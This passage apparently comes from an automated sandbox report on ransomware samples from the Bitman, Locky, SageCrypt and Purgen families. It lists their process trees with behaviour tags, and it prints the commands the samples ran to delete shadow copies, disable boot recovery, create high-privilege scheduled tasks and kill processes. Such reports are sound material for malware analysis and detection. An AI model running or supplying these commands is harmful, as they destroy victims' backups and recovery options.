                                      • Drops file in Windows directory
                                      • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:1896
                                      • C:\Windows\tfmgfuqhwhrg.exe
                                        C:\Windows\tfmgfuqhwhrg.exe
                                        4⤵
                                        • Executes dropped EXE
                                        • Adds Run key to start application
                                        • System Location Discovery: System Language Discovery
                                        • Suspicious use of AdjustPrivilegeToken
                                        • System policy modification
                                        PID:1676
                                      • C:\Windows\SysWOW64\cmd.exe
                                        "C:\Windows\system32\cmd.exe" /c DEL C:\Users\Admin\Desktop\00296\TR6544~1.EXE
                                        4⤵
                                          PID:2600
                                      • C:\Users\Admin\Desktop\00296\Trojan-Ransom.Win32.Bitman.lfd-26d2442e7257da462083ce764114d14aaf2971deed40bbba13e66c09a10c95e8.exe
                                        Trojan-Ransom.Win32.Bitman.lfd-26d2442e7257da462083ce764114d14aaf2971deed40bbba13e66c09a10c95e8.exe
                                        3⤵
                                        • Executes dropped EXE
                                        • Suspicious use of SetThreadContext
                                        • System Location Discovery: System Language Discovery
                                        • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                        • Suspicious use of SetWindowsHookEx
                                        PID:2064
                                        • C:\Users\Admin\Desktop\00296\Trojan-Ransom.Win32.Bitman.lfd-26d2442e7257da462083ce764114d14aaf2971deed40bbba13e66c09a10c95e8.exe
                                          Trojan-Ransom.Win32.Bitman.lfd-26d2442e7257da462083ce764114d14aaf2971deed40bbba13e66c09a10c95e8.exe
                                          4⤵
                                          • Drops file in Windows directory
                                          • System Location Discovery: System Language Discovery
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:3848
                                          • C:\Windows\oqhfwpkrucdv.exe
                                            C:\Windows\oqhfwpkrucdv.exe
                                            5⤵
                                            • Suspicious use of SetWindowsHookEx
                                            PID:2152
                                            • C:\Windows\oqhfwpkrucdv.exe
                                              C:\Windows\oqhfwpkrucdv.exe
                                              6⤵
                                                PID:1632
                                                • C:\Windows\System32\wbem\WMIC.exe
                                                  "C:\Windows\System32\wbem\WMIC.exe" shadowcopy delete /nointeractive
                                                  7⤵
                                                    PID:4780
                                              • C:\Windows\SysWOW64\cmd.exe
                                                "C:\Windows\system32\cmd.exe" /c DEL C:\Users\Admin\Desktop\00296\TR94DF~1.EXE
                                                5⤵
                                                  PID:4520
                                            • C:\Users\Admin\Desktop\00296\Trojan-Ransom.Win32.Bitman.nws-dc4edeb968c4913db0a632fe01b66ce036d0c3e3c275d7ea61807ca5bb53398d.exe
                                              Trojan-Ransom.Win32.Bitman.nws-dc4edeb968c4913db0a632fe01b66ce036d0c3e3c275d7ea61807ca5bb53398d.exe
                                              3⤵
                                              • Executes dropped EXE
                                              • Suspicious use of SetThreadContext
                                              • System Location Discovery: System Language Discovery
                                              • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                              • Suspicious use of SetWindowsHookEx
                                              PID:1400
                                              • C:\Users\Admin\Desktop\00296\Trojan-Ransom.Win32.Bitman.nws-dc4edeb968c4913db0a632fe01b66ce036d0c3e3c275d7ea61807ca5bb53398d.exe
                                                Trojan-Ransom.Win32.Bitman.nws-dc4edeb968c4913db0a632fe01b66ce036d0c3e3c275d7ea61807ca5bb53398d.exe
                                                4⤵
                                                • Drops file in Windows directory
                                                • System Location Discovery: System Language Discovery
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:3288
                                                • C:\Windows\tipgjhtcphse.exe
                                                  C:\Windows\tipgjhtcphse.exe
                                                  5⤵
                                                  • Suspicious use of SetWindowsHookEx
                                                  PID:4704
                                                  • C:\Windows\tipgjhtcphse.exe
                                                    C:\Windows\tipgjhtcphse.exe
                                                    6⤵
                                                      PID:5864
                                                      • C:\Users\Admin\Documents\wrbay.exe
                                                        C:\Users\Admin\Documents\wrbay.exe
                                                        7⤵
                                                          PID:3688
                                                          • C:\Windows\System32\vssadmin.exe
                                                            "C:\Windows\System32\vssadmin.exe" delete shadows /all /Quiet
                                                            8⤵
                                                            • Interacts with shadow copies
                                                            PID:4688
                                                        • C:\Windows\SysWOW64\NOTEPAD.EXE
                                                          "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\RECOVERY.TXT
                                                          7⤵
                                                          • Opens file in notepad (likely ransom note)
                                                          PID:6068
                                                        • C:\Program Files\Internet Explorer\iexplore.exe
                                                          "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\Desktop\RECOVERY.HTM
                                                          7⤵
                                                            PID:5632
                                                            • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                                              "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:5632 CREDAT:275457 /prefetch:2
                                                              8⤵
                                                                PID:5576
                                                            • C:\Users\Admin\Documents\rpfrw.exe
                                                              C:\Users\Admin\Documents\rpfrw.exe
                                                              7⤵
                                                                PID:4688
                                                                • C:\Windows\System32\vssadmin.exe
                                                                  "C:\Windows\System32\vssadmin.exe" delete shadows /all /Quiet
                                                                  8⤵
                                                                  • Interacts with shadow copies
                                                                  PID:5836
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                "C:\Windows\system32\cmd.exe" /c DEL C:\Windows\TIPGJH~1.EXE
                                                                7⤵
                                                                  PID:5696
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              "C:\Windows\system32\cmd.exe" /c DEL C:\Users\Admin\Desktop\00296\TR2AFF~1.EXE
                                                              5⤵
                                                                PID:4100
                                                          • C:\Users\Admin\Desktop\00296\Trojan-Ransom.Win32.Bitman.pyi-b25ba188ff6b80902ddb1428d85ad70156af8b10faec8f7b360f30587d15b1e0.exe
                                                            Trojan-Ransom.Win32.Bitman.pyi-b25ba188ff6b80902ddb1428d85ad70156af8b10faec8f7b360f30587d15b1e0.exe
                                                            3⤵
                                                            • Executes dropped EXE
                                                            • Drops file in Windows directory
                                                            • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:1992
                                                            • C:\Windows\tbovbplwqiow.exe
                                                              C:\Windows\tbovbplwqiow.exe
                                                              4⤵
                                                              • Executes dropped EXE
                                                              • Adds Run key to start application
                                                              • Drops file in Program Files directory
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              • System policy modification
                                                              PID:2628
                                                              • C:\Windows\System32\wbem\WMIC.exe
                                                                "C:\Windows\System32\wbem\WMIC.exe" shadowcopy delete /nointeractive
                                                                5⤵
                                                                  PID:2548
                                                                • C:\Windows\SysWOW64\NOTEPAD.EXE
                                                                  "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\_ReCoVeRy_.TXT
                                                                  5⤵
                                                                  • Opens file in notepad (likely ransom note)
                                                                  PID:6016
                                                                • C:\Program Files\Internet Explorer\iexplore.exe
                                                                  "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\Desktop\_ReCoVeRy_.HTM
                                                                  5⤵
                                                                    PID:5268
                                                                    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                                                      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:5268 CREDAT:275457 /prefetch:2
                                                                      6⤵
                                                                        PID:1620
                                                                    • C:\Windows\System32\wbem\WMIC.exe
                                                                      "C:\Windows\System32\wbem\WMIC.exe" shadowcopy delete /nointeractive
                                                                      5⤵
                                                                        PID:1864
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        "C:\Windows\system32\cmd.exe" /c DEL C:\Windows\TBOVBP~1.EXE
                                                                        5⤵
                                                                          PID:2032
                                                                          • C:\Users\Admin\AppData\Roaming\{1591EC7F-A229-1145-B746-F357D6852359}\raserver.exe
                                                                            "C:\Users\Admin\AppData\Roaming\{1591EC7F-A229-1145-B746-F357D6852359}\raserver.exe"
                                                                            6⤵
                                                                              PID:4064
                                                                              • C:\Windows\system32\vssadmin.exe
                                                                                "C:\Windows\system32\vssadmin.exe" delete shadows /all /quiet
                                                                                7⤵
                                                                                • Interacts with shadow copies
                                                                                PID:236
                                                                              • C:\Windows\system32\wbem\wmic.exe
                                                                                "C:\Windows\system32\wbem\wmic.exe" shadowcopy delete
                                                                                7⤵
                                                                                  PID:3992
                                                                                • C:\Windows\System32\bcdedit.exe
                                                                                  "C:\Windows\System32\bcdedit.exe" /set {default} recoveryenabled no
                                                                                  7⤵
                                                                                  • Modifies boot configuration data using bcdedit
                                                                                  PID:2932
                                                                                • C:\Windows\System32\bcdedit.exe
                                                                                  "C:\Windows\System32\bcdedit.exe" /set {default} bootstatuspolicy ignoreallfailures
                                                                                  7⤵
                                                                                  • Modifies boot configuration data using bcdedit
                                                                                  PID:3044
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            "C:\Windows\system32\cmd.exe" /c DEL C:\Users\Admin\Desktop\00296\TR1216~1.EXE
                                                                            4⤵
                                                                              PID:2548
                                                                          • C:\Users\Admin\Desktop\00296\Trojan-Ransom.Win32.Bitman.qkb-a736d43d5f69fb6ab0991011a66acf7d27e9c34adaea35289c42b10cacc09b73.exe
                                                                            Trojan-Ransom.Win32.Bitman.qkb-a736d43d5f69fb6ab0991011a66acf7d27e9c34adaea35289c42b10cacc09b73.exe
                                                                            3⤵
                                                                            • Executes dropped EXE
                                                                            • System Location Discovery: System Language Discovery
                                                                            • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                            PID:1616
                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 1616 -s 36
                                                                              4⤵
                                                                              • Loads dropped DLL
                                                                              • Program crash
                                                                              PID:4032
                                                                          • C:\Users\Admin\Desktop\00296\Trojan-Ransom.Win32.Bitman.qrz-d6104e9fc20382ec5bbffe87d660af1bff2cbdc14fcb75b636e7e999b858e6d9.exe
                                                                            Trojan-Ransom.Win32.Bitman.qrz-d6104e9fc20382ec5bbffe87d660af1bff2cbdc14fcb75b636e7e999b858e6d9.exe
                                                                            3⤵
                                                                            • Executes dropped EXE
                                                                            • Suspicious use of SetThreadContext
                                                                            • System Location Discovery: System Language Discovery
                                                                            • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                            PID:1304
                                                                            • C:\Users\Admin\Desktop\00296\Trojan-Ransom.Win32.Bitman.qrz-d6104e9fc20382ec5bbffe87d660af1bff2cbdc14fcb75b636e7e999b858e6d9.exe
                                                                              Trojan-Ransom.Win32.Bitman.qrz-d6104e9fc20382ec5bbffe87d660af1bff2cbdc14fcb75b636e7e999b858e6d9.exe
                                                                              4⤵
                                                                              • Drops file in Windows directory
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:3000
                                                                              • C:\Windows\hgipurralqoh.exe
                                                                                C:\Windows\hgipurralqoh.exe
                                                                                5⤵
                                                                                • Suspicious use of SetThreadContext
                                                                                • System Location Discovery: System Language Discovery
                                                                                PID:3644
                                                                                • C:\Windows\hgipurralqoh.exe
                                                                                  C:\Windows\hgipurralqoh.exe
                                                                                  6⤵
                                                                                  • Adds Run key to start application
                                                                                  • System Location Discovery: System Language Discovery
                                                                                  • System policy modification
                                                                                  PID:4896
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                "C:\Windows\system32\cmd.exe" /c DEL C:\Users\Admin\Desktop\00296\TRB50A~1.EXE
                                                                                5⤵
                                                                                  PID:5088
                                                                            • C:\Users\Admin\Desktop\00296\Trojan-Ransom.Win32.Blocker.keua-bdf2c59796b3d9a4026a940b820c627fcff7cb3909a85d7eeeabf6345931343f.exe
                                                                              Trojan-Ransom.Win32.Blocker.keua-bdf2c59796b3d9a4026a940b820c627fcff7cb3909a85d7eeeabf6345931343f.exe
                                                                              3⤵
                                                                              • Executes dropped EXE
                                                                              • Loads dropped DLL
                                                                              • System Location Discovery: System Language Discovery
                                                                              • NTFS ADS
                                                                              • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                              • Suspicious use of SetWindowsHookEx
                                                                              PID:1792
                                                                              • C:\Users\Admin\AppData\Roaming\logview32.exe
                                                                                "C:\Users\Admin\AppData\Roaming\logview32.exe"
                                                                                4⤵
                                                                                • Drops startup file
                                                                                • Loads dropped DLL
                                                                                • Adds Run key to start application
                                                                                • System Location Discovery: System Language Discovery
                                                                                • NTFS ADS
                                                                                • Suspicious use of SetWindowsHookEx
                                                                                PID:3080
                                                                                • C:\Users\Admin\AppData\Roaming\agfxdrv.exe
                                                                                  "C:\Users\Admin\AppData\Roaming\agfxdrv.exe"
                                                                                  5⤵
                                                                                    PID:5520
                                                                                  • C:\Users\Admin\AppData\Roaming\logview32.exe
                                                                                    C:\Users\Admin\AppData\Roaming\logview32.exe /control "" "0x00010064"
                                                                                    5⤵
                                                                                      PID:2684
                                                                                • C:\Users\Admin\Desktop\00296\Trojan-Ransom.Win32.Foreign.flts-ecb383fde6c516ff4f59f0756235136fce26bfc743c8491c8d6dd7c2b48a9bd2.exe
                                                                                  Trojan-Ransom.Win32.Foreign.flts-ecb383fde6c516ff4f59f0756235136fce26bfc743c8491c8d6dd7c2b48a9bd2.exe
                                                                                  3⤵
                                                                                  • Executes dropped EXE
                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                  • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                  PID:2976
                                                                                • C:\Users\Admin\Desktop\00296\Trojan-Ransom.Win32.Foreign.gthl-50d6f7d5e89d2b6a5510b4d85250dab9c2baa2d6eb99979dc67f1ea791b7291f.exe
                                                                                  Trojan-Ransom.Win32.Foreign.gthl-50d6f7d5e89d2b6a5510b4d85250dab9c2baa2d6eb99979dc67f1ea791b7291f.exe
                                                                                  3⤵
                                                                                  • Executes dropped EXE
                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                  • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                  PID:1732
                                                                                • C:\Users\Admin\Desktop\00296\Trojan-Ransom.Win32.Foreign.jpdw-30d7bf9fa71fda9eef1e658b30fa908ba27f40f7cd13087d64cfb8fefd2d3282.exe
                                                                                  Trojan-Ransom.Win32.Foreign.jpdw-30d7bf9fa71fda9eef1e658b30fa908ba27f40f7cd13087d64cfb8fefd2d3282.exe
                                                                                  3⤵
                                                                                  • Executes dropped EXE
                                                                                  • Adds Run key to start application
                                                                                  • System Location Discovery: System Language Discovery
                                                                                  • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                  PID:788
                                                                                  • C:\Windows\System32\cmd.exe
                                                                                    "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\dn39Dr3g\serv.bat"
                                                                                    4⤵
                                                                                      PID:5988
                                                                                  • C:\Users\Admin\Desktop\00296\Trojan-Ransom.Win32.Foreign.nnuo-b41660db6dcb0d3c7b17f98eae3141924c8c0ee980501ce541b42dc766f85628.exe
                                                                                    Trojan-Ransom.Win32.Foreign.nnuo-b41660db6dcb0d3c7b17f98eae3141924c8c0ee980501ce541b42dc766f85628.exe
                                                                                    3⤵
                                                                                    • Executes dropped EXE
                                                                                    • System Location Discovery: System Language Discovery
                                                                                    • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                    PID:1216
                                                                                    • C:\Windows\SysWOW64\msiexec.exe
                                                                                      msiexec.exe
                                                                                      4⤵
                                                                                        PID:5452
                                                                                    • C:\Users\Admin\Desktop\00296\Trojan-Ransom.Win32.Gen.ezt-72ddceebe717992c1486a2d5a5e9e20ad331a98a146d2976c943c983e088f66b.exe
                                                                                      Trojan-Ransom.Win32.Gen.ezt-72ddceebe717992c1486a2d5a5e9e20ad331a98a146d2976c943c983e088f66b.exe
                                                                                      3⤵
                                                                                      • Executes dropped EXE
                                                                                      • Suspicious use of SetThreadContext
                                                                                      • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                      PID:2432
                                                                                      • C:\Users\Admin\Desktop\00296\Trojan-Ransom.Win32.Gen.ezt-72ddceebe717992c1486a2d5a5e9e20ad331a98a146d2976c943c983e088f66b.exe
                                                                                        Trojan-Ransom.Win32.Gen.ezt-72ddceebe717992c1486a2d5a5e9e20ad331a98a146d2976c943c983e088f66b.exe
                                                                                        4⤵
                                                                                        • Adds Run key to start application
                                                                                        • Drops file in Program Files directory
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        PID:3372
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          cmd /c C:\Users\Admin\AppData\Local\Temp\__tFFE2.tmp.bat
                                                                                          5⤵
                                                                                            PID:1656
                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                            taskkill /F /T /PID 1120
                                                                                            5⤵
                                                                                            • Kills process with taskkill
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            PID:3268
                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                            taskkill /F /T /PID 792
                                                                                            5⤵
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            • Kills process with taskkill
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            PID:2116
                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                            taskkill /F /T /PID 1216
                                                                                            5⤵
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            • Kills process with taskkill
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            PID:1892
                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                            taskkill /F /T /PID 796
                                                                                            5⤵
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            • Kills process with taskkill
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            PID:1012
                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                            taskkill /F /T /PID 2164
                                                                                            5⤵
                                                                                            • Kills process with taskkill
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            PID:2908
                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                            taskkill /F /T /PID 2968
                                                                                            5⤵
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            • Kills process with taskkill
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            PID:1596
                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                            taskkill /F /T /PID 3144
                                                                                            5⤵
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            • Kills process with taskkill
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            PID:2280
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            cmd /c C:\Users\Admin\AppData\Local\Temp\__t1C19.tmp.bat
                                                                                            5⤵
                                                                                              PID:1124
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              cmd /c .bat
                                                                                              5⤵
                                                                                                PID:3992
                                                                                          • C:\Users\Admin\Desktop\00296\Trojan-Ransom.Win32.Locky.cs-28046c14ea3325885ee1e731cd0bcf9f38445df02675836b851cb2ae94c050eb.exe
                                                                                            Trojan-Ransom.Win32.Locky.cs-28046c14ea3325885ee1e731cd0bcf9f38445df02675836b851cb2ae94c050eb.exe
                                                                                            3⤵
                                                                                            • Executes dropped EXE
                                                                                            • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                            PID:796
                                                                                          • C:\Users\Admin\Desktop\00296\Trojan-Ransom.Win32.Locky.yr-c6cebfd3a588f5c05ff397b6e5740037b33288b8ce692a87f3918bbdecb5c421.exe
                                                                                            Trojan-Ransom.Win32.Locky.yr-c6cebfd3a588f5c05ff397b6e5740037b33288b8ce692a87f3918bbdecb5c421.exe
                                                                                            3⤵
                                                                                            • Executes dropped EXE
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                            PID:2348
                                                                                          • C:\Users\Admin\Desktop\00296\Trojan-Ransom.Win32.Purgen.fk-ecd3b069ea23e7905a1d4c4eff4a649cabef85bd541735ed810ab87cbf0ee9a3.exe
                                                                                            Trojan-Ransom.Win32.Purgen.fk-ecd3b069ea23e7905a1d4c4eff4a649cabef85bd541735ed810ab87cbf0ee9a3.exe
                                                                                            3⤵
                                                                                            • Executes dropped EXE
                                                                                            • Adds Run key to start application
                                                                                            • Drops desktop.ini file(s)
                                                                                            • Drops file in Program Files directory
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                            PID:2224
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              cmd /c C:\Users\Admin\AppData\Local\Temp\__tAE49.tmp.bat
                                                                                              4⤵
                                                                                                PID:2740
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                cmd /c C:\Users\Admin\AppData\Local\Temp\__tBEFD.tmp.bat
                                                                                                4⤵
                                                                                                  PID:2084
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  cmd /c C:\Users\Admin\AppData\Local\Temp\tmpBF0D.tmp.bat
                                                                                                  4⤵
                                                                                                    PID:2460
                                                                                                • C:\Users\Admin\Desktop\00296\Trojan-Ransom.Win32.Purgen.li-228b6531f211ef09eef0c3d573636849bdd5751494b371cc750d33275949a345.exe
                                                                                                  Trojan-Ransom.Win32.Purgen.li-228b6531f211ef09eef0c3d573636849bdd5751494b371cc750d33275949a345.exe
                                                                                                  3⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Suspicious use of SetThreadContext
                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                  • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                                  PID:1736
                                                                                                  • C:\Users\Admin\Desktop\00296\Trojan-Ransom.Win32.Purgen.li-228b6531f211ef09eef0c3d573636849bdd5751494b371cc750d33275949a345.exe
                                                                                                    Trojan-Ransom.Win32.Purgen.li-228b6531f211ef09eef0c3d573636849bdd5751494b371cc750d33275949a345.exe
                                                                                                    4⤵
                                                                                                    • Adds Run key to start application
                                                                                                    • Drops file in Program Files directory
                                                                                                    PID:3144
                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                      cmd /c C:\Users\Admin\AppData\Local\Temp\__tF75A.tmp.bat
                                                                                                      5⤵
                                                                                                        PID:3236
                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                        taskkill /F /T /PID 1120
                                                                                                        5⤵
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        • Kills process with taskkill
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        PID:3532
                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                        taskkill /F /T /PID 792
                                                                                                        5⤵
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        • Kills process with taskkill
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        PID:3312
                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                        taskkill /F /T /PID 1216
                                                                                                        5⤵
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        • Kills process with taskkill
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        PID:1204
                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                        taskkill /F /T /PID 796
                                                                                                        5⤵
                                                                                                        • Kills process with taskkill
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        PID:3320
                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                        taskkill /F /T /PID 1736
                                                                                                        5⤵
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        • Kills process with taskkill
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        PID:1868
                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                        taskkill /F /T /PID 2164
                                                                                                        5⤵
                                                                                                        • Kills process with taskkill
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        PID:3512
                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                        taskkill /F /T /PID 2968
                                                                                                        5⤵
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        • Kills process with taskkill
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        PID:3552
                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                        taskkill /F /T /PID 3200
                                                                                                        5⤵
                                                                                                        • Kills process with taskkill
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        PID:1744
                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                        taskkill /F /T /PID 3144
                                                                                                        5⤵
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        • Kills process with taskkill
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        PID:3248
                                                                                                  • C:\Users\Admin\Desktop\00296\Trojan-Ransom.Win32.SageCrypt.ddo-68598781fed72573be2a251f491debe461adafe669fe9989c7b9acdaf3164fc1.exe
                                                                                                    Trojan-Ransom.Win32.SageCrypt.ddo-68598781fed72573be2a251f491debe461adafe669fe9989c7b9acdaf3164fc1.exe
                                                                                                    3⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Loads dropped DLL
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                                    PID:2840
                                                                                                    • C:\Users\Admin\Desktop\00296\Trojan-Ransom.Win32.SageCrypt.ddo-68598781fed72573be2a251f491debe461adafe669fe9989c7b9acdaf3164fc1.exe
                                                                                                      "C:\Users\Admin\Desktop\00296\Trojan-Ransom.Win32.SageCrypt.ddo-68598781fed72573be2a251f491debe461adafe669fe9989c7b9acdaf3164fc1.exe" g
                                                                                                      4⤵
                                                                                                      • Executes dropped EXE
                                                                                                      PID:268
                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                      "C:\Windows\System32\schtasks.exe" /CREATE /TN "N0mFUQoa" /TR "C:\Users\Admin\AppData\Roaming\Rj3fNWF3.exe" /SC ONLOGON /RL HIGHEST /F
                                                                                                      4⤵
                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                      PID:2408
                                                                                                    • C:\Users\Admin\AppData\Roaming\Rj3fNWF3.exe
                                                                                                      "C:\Users\Admin\AppData\Roaming\Rj3fNWF3.exe"
                                                                                                      4⤵
                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                      PID:4060
                                                                                                      • C:\Users\Admin\AppData\Roaming\Rj3fNWF3.exe
                                                                                                        "C:\Users\Admin\AppData\Roaming\Rj3fNWF3.exe" g
                                                                                                        5⤵
                                                                                                          PID:4080
                                                                                                      • C:\Windows\SysWOW64\WScript.exe
                                                                                                        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f252888.vbs"
                                                                                                        4⤵
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        PID:4156
                                                                                                    • C:\Users\Admin\Desktop\00296\Trojan-Ransom.Win32.SageCrypt.dqp-f53f4de727118c47a164d6a19b2b53446f8915e14a6a3a26bfa65e1e3e2393be.exe
                                                                                                      Trojan-Ransom.Win32.SageCrypt.dqp-f53f4de727118c47a164d6a19b2b53446f8915e14a6a3a26bfa65e1e3e2393be.exe
                                                                                                      3⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Loads dropped DLL
                                                                                                      • Enumerates connected drives
                                                                                                      • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                                      PID:3020
                                                                                                      • C:\Users\Admin\Desktop\00296\Trojan-Ransom.Win32.SageCrypt.dqp-f53f4de727118c47a164d6a19b2b53446f8915e14a6a3a26bfa65e1e3e2393be.exe
                                                                                                        "C:\Users\Admin\Desktop\00296\Trojan-Ransom.Win32.SageCrypt.dqp-f53f4de727118c47a164d6a19b2b53446f8915e14a6a3a26bfa65e1e3e2393be.exe" g
                                                                                                        4⤵
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        PID:3612
                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                        "C:\Windows\System32\schtasks.exe" /CREATE /TN "N0mFUQoa" /TR "C:\Users\Admin\Desktop\00296\Trojan-Ransom.Win32.SageCrypt.dqp-f53f4de727118c47a164d6a19b2b53446f8915e14a6a3a26bfa65e1e3e2393be.exe" /SC ONLOGON /RL HIGHEST /F
                                                                                                        4⤵
                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                        PID:3896
                                                                                                      • C:\Windows\SysWOW64\vssadmin.exe
                                                                                                        "C:\Windows\System32\vssadmin.exe" delete shadows /all /quiet
                                                                                                        4⤵
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        • Interacts with shadow copies
                                                                                                        PID:5212
                                                                                                      • C:\Windows\SysWOW64\vssadmin.exe
                                                                                                        "C:\Windows\System32\vssadmin.exe" delete shadows /all /quiet
                                                                                                        4⤵
                                                                                                        • Interacts with shadow copies
                                                                                                        PID:5964
                                                                                                      • C:\Windows\SysWOW64\vssadmin.exe
                                                                                                        "C:\Windows\System32\vssadmin.exe" delete shadows /all /quiet
                                                                                                        4⤵
                                                                                                        • Interacts with shadow copies
                                                                                                        PID:1052
                                                                                                      • C:\Windows\SysWOW64\mshta.exe
                                                                                                        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\!HELP_SOS.hta"
                                                                                                        4⤵
                                                                                                          PID:3348
                                                                                                        • C:\Windows\SysWOW64\WScript.exe
                                                                                                          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f1.vbs"
                                                                                                          4⤵
                                                                                                            PID:6136
                                                                                                        • C:\Users\Admin\Desktop\00296\Trojan-Ransom.Win32.SageCrypt.e-f09493a029ce9f3025c9ba5c998d47b731babfd839c1e260bc3bbc3f80ca8dea.exe
